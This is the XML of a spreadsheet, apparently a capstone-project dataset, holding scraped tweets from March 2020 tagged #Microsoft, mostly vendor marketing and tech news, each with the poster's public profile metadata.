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Capstone Project\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{5AD81B10-363B-4C48-912B-4788782FA075}" xr6:coauthVersionLast="44" xr6:coauthVersionMax="44" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="-120" yWindow="-120" windowWidth="20730" windowHeight="11160" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
  </bookViews>
  <sheets>
    <sheet name="#microsoft1" sheetId="1" r:id="rId1"/>
    <sheet name="Sheet1" sheetId="2" r:id="rId2"/>
  </sheets>
  <definedNames>
    <definedName name="Annotation">Sheet1!$A$1:$A$6</definedName>
  </definedNames>
  <calcPr calcId="0"/>
</workbook>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="38163" uniqueCount="22571">
  <si>
    <t>Fri Mar 06 11:21:36 +0000 2020</t>
  </si>
  <si>
    <t>en</t>
  </si>
  <si>
    <t>US tech giants Cisco and Microsoft are combining their cloud #IoT offerings, with... https://t.co/6qb4PHfc7i #Tech #Microsoft #TechNews #Business #Cisco #cloud #EmergingTech @Microsoft @Cisco @iotconsortium @iotforall @IoTNow_ @IoTEvolution @IoTBlogs @iotguide #FridayThoughts</t>
  </si>
  <si>
    <t>{'id': 3473411475, 'id_str': '3473411475', 'name': 'Niel Kirk å°¼å°”æŸ¯å…‹', 'screen_name': 'MasterofIoT', 'location': 'San BartolomÃ© de Tirajana', 'description': "Bid Director at Telefonica. #Runner. #Cyclist | #Influencer #IoT #IIoT #AI #ML #DL #Smartcities #Startups #business. All views are my own &amp; no one else's", 'url': 'https://t.co/OymD2Nabkp', 'entities': {'url': {'urls': [{'url': 'https://t.co/OymD2Nabkp', 'expanded_url': 'https://www.linkedin.com/in/niel-k-7156551', 'display_url': 'linkedin.com/in/niel-k-7156â€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2016, 'friends_count': 2655, 'listed_count': 105, 'created_at': 'Fri Aug 28 21:19:46 +0000 2015', 'favourites_count': 34926, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 17410,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'http://pbs.twimg.com/profile_images/1129558162053316608/BvFJdGYr_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1129558162053316608/BvFJdGYr_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3473411475/1499105015',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</si>
  <si>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11:15:25 +0000 2020</t>
  </si>
  <si>
    <t>L = Lesson Being 2nd makes you work No one gets or stays good without work #WorkSmart #TeamRealzies #RCstreams #Twitch #Mixer #Dlive #YouTube #StreamerNetwork #Microsoft #Sony #Nintendo https://t.co/9X3gNKJhUc</t>
  </si>
  <si>
    <t>{'id': 841309721596481537, 'id_str': '841309721596481537', 'name': 'Fuzzilla &amp; RC Rollout2020', 'screen_name': 'Fuzzilla', 'location': 'Raleigh NC', 'description': 'World Record Holder @RealziesCuts Throwing Knives Call of Duty WW2 Xbox. Comedy, Motivation and Good Vibes #Rollout2020 #Crohns Ambassador for @joyundilutedmbs', 'url': 'https://t.co/pc7BqAEk9y', 'entities': {'url': {'urls': [{'url': 'https://t.co/pc7BqAEk9y', 'expanded_url': 'http://linktr.ee/realziescuts', 'display_url': 'linktr.ee/realziescuts', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3600, 'friends_count': 2709, 'listed_count': 27, 'created_at': 'Mon Mar 13 15:27:23 +0000 2017', 'favourites_count': 21929, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 51393, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1164167918457896961/eL1Ye53G_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1164167918457896961/eL1Ye53G_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/841309721596481537/1524588288',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</si>
  <si>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11:14:45 +0000 2020</t>
  </si>
  <si>
    <t>Is your computer working for you? Are you utilising the features Windows 10 offers? Here's some easy ways to change your computer to suit you better 
https://t.co/1TTkhZeqAH...
#windows10 #microsoft #windows #windows10help #windows10pro #windows10devices #maintenance #business</t>
  </si>
  <si>
    <t>{'id': 87927501, 'id_str': '87927501', 'name': 'Ocean Telecom UK Ltd', 'screen_name': 'oceantele', 'location': 'Oswestry', 'description': 'Shropshireâ€™s leading independent business telecoms and IT specialist.', 'url': 'https://t.co/hjdwgBcbdF', 'entities': {'url': {'urls': [{'url': 'https://t.co/hjdwgBcbdF', 'expanded_url': 'http://www.oceantele.com', 'display_url': 'oceantele.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 267, 'friends_count': 156, 'listed_count': 15, 'created_at': 'Fri Nov 06 12:17:47 +0000 2009', 'favourites_count': 105, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1209,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'http://pbs.twimg.com/profile_images/796028512952000514/Cbibgn-1_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/796028512952000514/Cbibgn-1_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/87927501/1558699325',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</si>
  <si>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11:12:00 +0000 2020</t>
  </si>
  <si>
    <t>IT Operational Leader @mrshollyrae has worked in IT for 16 years helps people 'work smarter' with #Microsoft products, currently on an apprenticeship program studying for a degree in management, as well as running the IT Apprentice Network #iwduniLeeds #iwd2020 @UniLeedsStaff https://t.co/gxigiru5MX</t>
  </si>
  <si>
    <t>{'id': 2178359035, 'id_str': '2178359035', 'name': 'Women at UoL', 'screen_name': 'Women_at_UoL', 'location': 'Leeds', 'description': 'The network for all women at the University of Leeds, https://t.co/txFSDxx1Kf', 'url': 'http://t.co/MBp4KvRw00', 'entities': {'url': {'urls': [{'url': 'http://t.co/MBp4KvRw00', 'expanded_url': 'http://www.leeds.ac.uk', 'display_url': 'leeds.ac.uk', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'https://t.co/txFSDxx1Kf', 'expanded_url': 'https://equality.leeds.ac.uk/staff-networks/waln/', 'display_url': 'equality.leeds.ac.uk/staff-networksâ€¦', 'indices': [54, 77]}]}}, 'protected': False, 'followers_count': 1101, 'friends_count': 246, 'listed_count': 27, 'created_at': 'Wed Nov 06 16:07:55 +0000 2013', 'favourites_count': 146, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2496,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'http://pbs.twimg.com/profile_images/698179617232920576/pNIWwXrN_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/698179617232920576/pNIWwXrN_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2178359035/1455295027',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</si>
  <si>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11:11:39 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft does not provide any way to convert an existing team configuration to SET. This free PowerShell script does exactly that. Enjoy! #Microsoft #HyperV https://t.co/rcpLVoy8Up</t>
  </si>
  <si>
    <t>{'id': 701347291, 'id_str': '701347291', 'name': 'Altaro Software', 'screen_name': 'AltaroSoftware', 'location': '', 'description': 'We publish high-quality #HyperV, #VMware &amp; #MSP content written by experienced IT pros every day. From the developers of the award-winning Altaro VM Backup.', 'url': 'https://t.co/PZtXGCPXnV', 'entities': {'url': {'urls': [{'url': 'https://t.co/PZtXGCPXnV', 'expanded_url': 'https://www.altaro.com', 'display_url': 'altaro.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3266, 'friends_count': 1848, 'listed_count': 88, 'created_at': 'Tue Jul 17 16:28:52 +0000 2012', 'favourites_count': 7936, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 6259,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'http://pbs.twimg.com/profile_images/1082976958407995392/0mEujcLG_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1082976958407995392/0mEujcLG_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/701347291/1565712597',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</si>
  <si>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Mar 06 11:10:11 +0000 2020</t>
  </si>
  <si>
    <t>Me, my Mobile &amp;amp; my Tablet
Mobile : i got a huge collection of videos in my whatsapp, camera , prime videos, netflix series 
https://t.co/75eu9KPNhk
https://t.co/U45RO5Je8g
https://t.co/6WgJC8gbAm
#iamintel #intel #windows10 #microsoft #android #mobile #ios #iphone #ipad https://t.co/5wMzgAXiMA</t>
  </si>
  <si>
    <t>{'id': 3513597200, 'id_str': '3513597200', 'name': 'CnX Player', 'screen_name': 'cnxplayer', 'location': '', 'description': 'CnX Player - Powerful 4K 10-bit ultra HD Media Player for Windows 10 (Aided by Intel) , Android &amp; iOS. Supports Video Casting to ATV, FireTV &amp; ChromeCast.', 'url': 'http://t.co/C09xQeiLyE', 'entities': {'url': {'urls': [{'url': 'http://t.co/C09xQeiLyE', 'expanded_url': 'http://www.cnxplayer.com', 'display_url': 'cnxplayer.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 379, 'friends_count': 902, 'listed_count': 2, 'created_at': 'Thu Sep 10 08:39:19 +0000 2015', 'favourites_count': 3461, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2207, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '3E3E3E', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1083221849998266369/0eU1_c7T_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1083221849998266369/0eU1_c7T_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3513597200/1545884255',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</si>
  <si>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11:07:49 +0000 2020</t>
  </si>
  <si>
    <t>#blazor vs #javascript  what developers should choose for next greenfield project? Let's rock Web again :D
#wasm #webassembly #dotnetcore #aspnetcore #microsoft #development #ux #ui #rwd #webdevelopers #dotnetcore #aspnetcore #dotnet #webdevelopers #csharp https://t.co/ekYUNfIfPY</t>
  </si>
  <si>
    <t>{'id': 528889847, 'id_str': '528889847', 'name': 'Piotr Stola', 'screen_name': 'quick_net', 'location': '', 'description': '.NET Consultant / Software Architect. Enthusiast of #AspNetCore #DotNet #MVC and #DevExpress #DevExtreme. Happy to help with #code and #business processesðŸ“² ðŸ’»', 'url': 'http://t.co/bmh43Irgh1', 'entities': {'url': {'urls': [{'url': 'http://t.co/bmh43Irgh1', 'expanded_url': 'http://www.quick-solution.net', 'display_url': 'quick-solution.net', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 155, 'friends_count': 418, 'listed_count': 12, 'created_at': 'Sun Mar 18 22:10:22 +0000 2012', 'favourites_count': 313, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 594,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'http://pbs.twimg.com/profile_images/585780181266075649/lBwNyYs3_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/585780181266075649/lBwNyYs3_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/528889847/1568808409',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</si>
  <si>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11:02:29 +0000 2020</t>
  </si>
  <si>
    <t>Find out how the Care Database Accelerates Growth with Azure Optimisation: https://t.co/xpcwTdrvNa
#Azure #CaseStudy #Microsoft</t>
  </si>
  <si>
    <t>{'id': 39971449, 'id_str': '39971449', 'name': 'Cloud Direct â˜ï¸', 'screen_name': 'clouddirect', 'location': 'Bath, UK', 'description': 'Helping businesses on their journeys to the cloud. One of only a few Microsoft Azure Expert MSPs worldwide. We know a thing or two about #Azure #MicrosoftGold', 'url': 'https://t.co/7zvztoi3eN', 'entities': {'url': {'urls': [{'url': 'https://t.co/7zvztoi3eN', 'expanded_url': 'https://www.clouddirect.net', 'display_url': 'clouddirect.net', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3049, 'friends_count': 2813, 'listed_count': 317, 'created_at': 'Thu May 14 11:01:29 +0000 2009', 'favourites_count': 1429, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 8808,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'http://pbs.twimg.com/profile_images/710748848608702465/DH6g-QzT_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/710748848608702465/DH6g-QzT_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/39971449/1570700858', 'profile_link_color': '1B95E0', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': 'FFFFFF', 'profile_text_color': '242424', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Mar 06 11:01:21 +0000 2020</t>
  </si>
  <si>
    <t>Former Apple CEO: Walmarts health-care services will cause a consumer revolution
https://t.co/89E1lvdAzp
#sdoh #socialdeterminantsofhealth #gohealthhero #pophealth #health #wellbeing #valuebased #healthit #salesforce #cerner #epic #microsoft #Z55 #Z65 #walmart</t>
  </si>
  <si>
    <t>{'id': 471143006, 'id_str': '471143006', 'name': 'Health Hero, Inc', 'screen_name': 'GoHealthHero', 'location': 'San Francisco, CA', 'description': 'Modern Health Engagement #sdoh #digitalhealth #pophealth #health #wellbeing', 'url': 'https://t.co/wNb1zXHhMo', 'entities': {'url': {'urls': [{'url': 'https://t.co/wNb1zXHhMo', 'expanded_url': 'http://gohealthhero.com', 'display_url': 'gohealthhero.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1081, 'friends_count': 4991, 'listed_count': 90, 'created_at': 'Sun Jan 22 15:02:40 +0000 2012', 'favourites_count': 1102, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1311,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'http://pbs.twimg.com/profile_images/891776955447599104/s61DvWLL_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/891776955447599104/s61DvWLL_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/471143006/1501451120',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</si>
  <si>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11:01:02 +0000 2020</t>
  </si>
  <si>
    <t>2020 is starting off with an exciting strategic partnership between @SolgariConverse and @TechLabsLondon!
https://t.co/tuhJKkhg0F 
#Solgari #Microsoft #Techlabs #ipropertycloud #cloudcomputing #Msdyn365 #Innovation</t>
  </si>
  <si>
    <t>{'id': 421157177, 'id_str': '421157177', 'name': 'Solgari', 'screen_name': 'SolgariConverse', 'location': 'Worldwide', 'description': 'The Dynamics 365 All-Channel Business Communications Solution.', 'url': 'https://t.co/LzQAP9WcM5', 'entities': {'url': {'urls': [{'url': 'https://t.co/LzQAP9WcM5', 'expanded_url': 'http://www.solgari.com', 'display_url': 'solgari.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1613, 'friends_count': 2005, 'listed_count': 72, 'created_at': 'Fri Nov 25 15:40:19 +0000 2011', 'favourites_count': 5379, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2971,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'http://pbs.twimg.com/profile_images/1101077176995196929/qeXn4y9-_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1101077176995196929/qeXn4y9-_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/421157177/1553857526', 'profile_link_color': '981CEB',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</si>
  <si>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11:00:58 +0000 2020</t>
  </si>
  <si>
    <t>"Technology's a natural extension of how we do our job. (It) has to fit into the experience for our co-workers and our customers," said @NewBelgium. #Dynamics365 #CRM empowers it. A #Microsoft partner, QGate Software Limited can too. https://t.co/EEXluXYM9d</t>
  </si>
  <si>
    <t>{'id': 88912276, 'id_str': '88912276', 'name': 'QGate', 'screen_name': 'QGateSoftware', 'location': 'Global (UK HQ)', 'description': '#CRM specialists delivering #Dynamics365, #InforCRM, and #ClickLearn solutions to help businesses exceed their goals ðŸš€ Well known for our â­â­â­â­â­ support!', 'url': 'https://t.co/SWTPnFJnS2', 'entities': {'url': {'urls': [{'url': 'https://t.co/SWTPnFJnS2', 'expanded_url': 'http://qgate.co.uk', 'display_url': 'qgate.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1413, 'friends_count': 1493, 'listed_count': 183, 'created_at': 'Tue Nov 10 12:01:48 +0000 2009', 'favourites_count': 2549, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6513, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '005EB8', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1213091115005550594/gpFdizhp_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1213091115005550594/gpFdizhp_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/88912276/1581611380', 'profile_link_color': '005EB8',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</si>
  <si>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11:00:46 +0000 2020</t>
  </si>
  <si>
    <t>#MicrosoftTeams has 20 million daily active users for good reason. It brings together all your team's conversations, files and tools into a single, intuitive workspace. See what's new in #MSTeams - https://t.co/sSrxnfuItT #Microsoft #Office365 #FlexibleWorking #TuesdayMotivation https://t.co/zRkfNzTo1V</t>
  </si>
  <si>
    <t>{'id': 907133065591435264, 'id_str': '907133065591435264', 'name': 'Cloud1 Ltd', 'screen_name': 'GoCloudtweeter', 'location': 'United Kingdom', 'description': 'Fully managed Cloud IT as a Service.', 'url': 'https://t.co/aV0azZeFF5', 'entities': {'url': {'urls': [{'url': 'https://t.co/aV0azZeFF5', 'expanded_url': 'http://www.securecloudaas.com', 'display_url': 'securecloudaas.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2337, 'friends_count': 4947, 'listed_count': 12, 'created_at': 'Mon Sep 11 06:45:51 +0000 2017', 'favourites_count': 265, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 567,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'http://pbs.twimg.com/profile_images/1212719266056822784/Uovg9zVb_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1212719266056822784/Uovg9zVb_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/907133065591435264/1577969507', 'profile_link_color': '00B7ED',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</si>
  <si>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11:00:07 +0000 2020</t>
  </si>
  <si>
    <t>When 40% of an airline's operating budget is devoted to fuel, the smallest savings amounts to tens of millions of dollars. See how advanced analytics in #Microsoft #Azure helps Rolls Royce uses data &amp;amp; maximize fuel efficiency. https://t.co/AgiiuxT92r</t>
  </si>
  <si>
    <t>{'id': 2148539517, 'id_str': '2148539517', 'name': 'Nick Harshbarger', 'screen_name': 'nicharsh', 'location': 'Charlotte, NC', 'description': 'Sales Geek, @sentryone SVP, John Deere driver, and Harley Rider', 'url': 'https://t.co/8vupVcWF1d', 'entities': {'url': {'urls': [{'url': 'https://t.co/8vupVcWF1d', 'expanded_url': 'http://www.sentryone.com', 'display_url': 'sentryone.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1063, 'friends_count': 899, 'listed_count': 46, 'created_at': 'Tue Oct 22 14:19:37 +0000 2013', 'favourites_count': 8260, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 8035,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'http://pbs.twimg.com/profile_images/913509447552651264/mHGkBVj3_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/913509447552651264/mHGkBVj3_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2148539517/1506632567',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</si>
  <si>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10:55:31 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft-owned professional networking platform LinkedIn (@LinkedIn) has started informing job candidates that they have the option to conduct their interviews virtually or delay, in view of the ongoing #novelcoronavirus (#COVID19) outbreak. 
Photo: IANS https://t.co/QPM4BVmch0</t>
  </si>
  <si>
    <t>{'id': 1169950443692158977, 'id_str': '1169950443692158977', 'name': 'IANSLIFE', 'screen_name': 'ianslife_in', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 93, 'friends_count': 15, 'listed_count': 2, 'created_at': 'Fri Sep 06 12:28:28 +0000 2019', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5782, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1175067647420948480/Lq3yGdll_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1175067647420948480/Lq3yGdll_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1169950443692158977/1568992935',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</si>
  <si>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10:53:04 +0000 2020</t>
  </si>
  <si>
    <t>Chromium #pcexpander #cybernews #tecnologia #tecnology #cybersecurity #nonstopnews #apple #microsoft https://t.co/bnzUTGwe65</t>
  </si>
  <si>
    <t>{'id': 584891568, 'id_str': '584891568', 'name': 'Pc Expander', 'screen_name': 'pcexpander', 'location': 'Italia', 'description': 'Il canale Twitter ufficiale del Portale Informatico PC EXPANDER interamente dedicato alla divulgazione informatica e tecnologica.', 'url': 'https://t.co/buegTDBsW8', 'entities': {'url': {'urls': [{'url': 'https://t.co/buegTDBsW8', 'expanded_url': 'http://www.pcexpander.it', 'display_url': 'pcexpander.it', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2308, 'friends_count': 2160, 'listed_count': 164, 'created_at': 'Sat May 19 14:37:19 +0000 2012', 'favourites_count': 5032, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 350786,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'http://pbs.twimg.com/profile_images/1161930435552788481/Fso4di0M_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1161930435552788481/Fso4di0M_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/584891568/1577997278', 'profile_link_color': '000080',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</si>
  <si>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10:46:13 +0000 2020</t>
  </si>
  <si>
    <t>$MSFT enters a Downtrend as Momentum Indicator dropped below the 0 level on February 21, 2020. View odds for this and other indicators: https://t.co/KenLk1QJOY #Microsoft #stockmarket #stock #technicalanalysis #money #trading #investing #daytrading #news #today https://t.co/pbxYpCYYBn</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</si>
  <si>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</si>
  <si>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10:44:44 +0000 2020</t>
  </si>
  <si>
    <t>If you're nervous, pull yourself together... or give in good #Joliet  #kimkardashian #teaching #microsoft https://t.co/X1hqjvlK34</t>
  </si>
  <si>
    <t>{'id': 1235668932838797312, 'id_str': '1235668932838797312', 'name': 'Laura Evans', 'screen_name': 'gilijingdes', 'location': 'Virginia Beach, USA', 'description': 'Sometimes the heart sees what is invisible to the eye.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 0, 'friends_count': 10, 'listed_count': 0, 'created_at': 'Thu Mar 05 20:50:13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'http://pbs.twimg.com/profile_images/1235708773257416706/IReQNLXr_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235708773257416706/IReQNLXr_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235668932838797312/1583450934',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</si>
  <si>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10:44:32 +0000 2020</t>
  </si>
  <si>
    <t>Hit the fuzz...... https://t.co/SM0ThOIQ1F #Software #softwaredevelopment #fuzzing #TechNews #coding #Microsoft</t>
  </si>
  <si>
    <t>{'id': 309738519, 'id_str': '309738519', 'name': 'Peter Welch', 'screen_name': 'PeterGWelch', 'location': 'Yorkshire and The Humber', 'description': 'A software developer who is also mad on history, rugby, cooking and retro gaming!', 'url': 'https://t.co/7WCQRLefP3', 'entities': {'url': {'urls': [{'url': 'https://t.co/7WCQRLefP3', 'expanded_url': 'https://peterwelchsite.wordpress.com/', 'display_url': 'peterwelchsite.wordpress.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 362, 'friends_count': 466, 'listed_count': 275, 'created_at': 'Thu Jun 02 15:51:58 +0000 2011', 'favourites_count': 1543, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5616,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'http://pbs.twimg.com/profile_images/907211407472644096/mD6Nda7U_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/907211407472644096/mD6Nda7U_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/309738519/1432716517',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</si>
  <si>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10:44:13 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Graph API creates a powerful way to empower your existing #applications, #webapps, #Bots, and agents. You can create customized #intelligentapps powered on usage data in your company to boost productivity or create powerful insights.
https://t.co/Ac4YMARW9s</t>
  </si>
  <si>
    <t>{'id': 43687388, 'id_str': '43687388', 'name': 'SpadeWorx', 'screen_name': 'spadeworx', 'location': 'USA, India and UK', 'description': 'Focused on Employee Engagement, Productivity, and Innovation solutions, powered by AI, ML, and NLP with users @ the center of the design.', 'url': 'http://t.co/ICLqqbg1bv', 'entities': {'url': {'urls': [{'url': 'http://t.co/ICLqqbg1bv', 'expanded_url': 'http://www.spadeworx.com', 'display_url': 'spadeworx.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 686, 'friends_count': 981, 'listed_count': 59, 'created_at': 'Sun May 31 13:28:30 +0000 2009', 'favourites_count': 58, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 975,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'http://pbs.twimg.com/profile_images/491902148871852034/T_dkgoKS_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/491902148871852034/T_dkgoKS_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/43687388/1559291850', 'profile_link_color': 'E86710',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</si>
  <si>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Fri Mar 06 10:42:15 +0000 2020</t>
  </si>
  <si>
    <t>New nude photos on my website #Utah   #dog #microsoft https://t.co/il6Cdv5ZA5</t>
  </si>
  <si>
    <t>{'id': 1235764372632461312, 'id_str': '1235764372632461312', 'name': 'Kara Rodriguez', 'screen_name': 'niefremfiju', 'location': 'Columbia, USA', 'description': 'My night has become a sunny dawn because of you', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2, 'friends_count': 9, 'listed_count': 0, 'created_at': 'Fri Mar 06 03:09:26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'http://pbs.twimg.com/profile_images/1235792787238539264/vK0_C7ZU_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235792787238539264/vK0_C7ZU_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235764372632461312/1583470974',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</si>
  <si>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10:41:05 +0000 2020</t>
  </si>
  <si>
    <t>Brilliant move @Microsoft  #Microsoft #COVID19 https://t.co/r1Z2eK4teg</t>
  </si>
  <si>
    <t>{'id': 57555161, 'id_str': '57555161', 'name': 'Pravil', 'screen_name': 'pravilz', 'location': 'Bangalore, India', 'description': 'Regional Escalation Manager @vmware Blogger | Web- Cloud enthusiast | Soccer/Messi/Argentina/ FCB fan | PS- Tweets are mine | RTs are not endorsements', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 351, 'friends_count': 1002, 'listed_count': 49, 'created_at': 'Fri Jul 17 04:46:16 +0000 2009', 'favourites_count': 1089, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2150,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'http://pbs.twimg.com/profile_images/730453786158731264/rB-SITd7_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/730453786158731264/rB-SITd7_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/57555161/1505207882',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</si>
  <si>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10:39:22 +0000 2020</t>
  </si>
  <si>
    <t>Google I/O Developer Conference Cancelled Due To Coronavirus Outbreak
Read full article: https://t.co/2U45UfRjbG
@Microsoft
#distilnfo #itnews #technology #microsoft #IO #developerconference #sanfrancisco #coronavirus #coronavirusoutbreak #covid19 https://t.co/jQPPGnTUrD</t>
  </si>
  <si>
    <t>{'id': 1126807393889705984, 'id_str': '1126807393889705984', 'name': 'DistilNFO IT Advisory', 'screen_name': 'distilnfoit', 'location': 'United States', 'description': 'A IT Industry Advisory Newsletter published weekly. This newsletter gives the subscriber a view into the top IT news of the week.', 'url': 'https://t.co/8rk45DZWmO', 'entities': {'url': {'urls': [{'url': 'https://t.co/8rk45DZWmO', 'expanded_url': 'https://www.distilnfo.com/itadvisory', 'display_url': 'distilnfo.com/itadvisory', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 71, 'friends_count': 275, 'listed_count': 0, 'created_at': 'Fri May 10 11:13:12 +0000 2019', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 151, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 